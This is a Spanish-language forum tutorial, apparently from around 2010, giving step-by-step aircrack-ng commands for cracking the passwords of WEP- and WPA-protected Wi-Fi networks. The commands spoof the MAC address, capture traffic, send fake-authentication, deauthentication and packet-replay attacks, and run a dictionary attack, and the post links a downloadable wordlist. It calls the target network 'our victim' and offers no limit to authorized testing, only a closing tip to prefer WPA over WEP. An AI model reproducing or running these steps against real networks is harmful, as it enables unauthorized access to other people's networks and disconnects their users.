Aqui les traigo este tutorial hecho por mi para poder descifrar la contrasea de u

na red inalambrica con cifrado WEP y WPA.

Para crackear WPA necesitas un Diccionario, y aircrack probara palabra por palab
ra que se encuentre dentro del diccionario para intentar descifrar, entonces, si
la contrasea no se encuentra dentro de esta, no la descifrara!, Tambien necesita
s un Cliente conectado, para usar una Falsa Autenticacion, si no consigues ningu
n cliente (STATION) conectado no podrs crackear la clave!
Nota: Para modems que tienen filtrado de MAC, tambien necesitaras un STATION inc
lusive si estas intentando crackear WEP, una ves que tengas el STATION disponibl
e, solo cambia el 11:22:33:44:55 por la direccion MAC del STATION en todos los p
asos que veas 11:22:33:44:55
ACTUALIZACION 24/SEPTIEMBRE/2010 ---------------- DICCIONARIO PARA WPA

Descarga del diccionario para WPA (Subido Por MI)

Lo primero es instalar la Suite aircrack-ng
dijo:
sudo apt-get install aircrack-ng

Luego instalamos Macchanger

dijo:
sudo apt-get install macchanger

Una vez instalado nos aseguramos de no estar conectados en ninguna red inalambri
ca, dando click derecho en el icono de la red y desactivando la red inalambrica,
y abrimos una terminal:
- Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO
SE PUEDE ACTIVAR, NO PODRS CRACKEAR)
dijo:
Sudo airmon-ng start wlan0

- Vemos que nos sale que se activo en mon0, asi es que trabajaremos con mon0
-Damos de Baja mon0
dijo:
sudo ifconfig mon0 down

-Cambiamos la direccion mac de mon0 por 00:11:22:33:44:55

dijo:
sudo macchanger -m 00:11:22:33:44:55 mon0

- Damos de alta mon0

dijo:
sudo ifconfig mon0 up
- Escaneamos las redes disponibles, y encontraremos nuestra victima
dijo:
sudo airodump-ng mon0

- Detenemos la escaneada pulsando

dijo:
control c

- Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestr
a victima
dijo:
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

- Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red

- Cambiando los datos de los corchetes por los de nuestra victima
PARA WEP
dijo:
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA
dijo:
sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0

- Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal

cambiando los datos de los corchetes por los de nuestra victima.
PARA WEP
dijo:
sudo aireplay-ng -2 -p 0841 -c FFFFFFF -b [direccion MAC] -h 00:11:22:33:44:55 m
on0

LAS CARITAS () DEBE SER :f (DOS PUNTOS Y UNA F, SIN ESPACIO, SOLO QUE TARINGA! T
E CAMBIA LOS DOS PUNTOS JUNTO A LA F POR )
DANDO COMO RESULTADO SEIS (6) PARES DE F'S SEPARADOS POR CINCO (5) DOS PUNTOS (
- Le decimos que si (y) y le damos enter
PARA WPA
dijo:
sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap

Descarga del diccionario para WPA (Subido Por MI)

PARA WEP
- Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nue
va terminal cambiando los datos de los corchetes por los de nuestra victima.
dijo:
sudo aircrack-ng -z [nombre red]*.cap

y esperamos a que nos descifre la clave, una ves descifrada con exito te dara la
clave en formato [XX:XX:XX:XX:XX], y activa tu red inalambrica dando click dere
cho al icono de la red, Seleccionamos la red crackeada e ingresamos la clave que
nos dio de resultado aircrack en formato XXXXXXXXXX. Y LISTO! ya crackeaste una
red WIFI con encriptacion WEP o WPA.
Consejo: NO UTILIZES ENCRIPTACION WEP PARA TU RED, UTILIZA EN LUGAR WPA!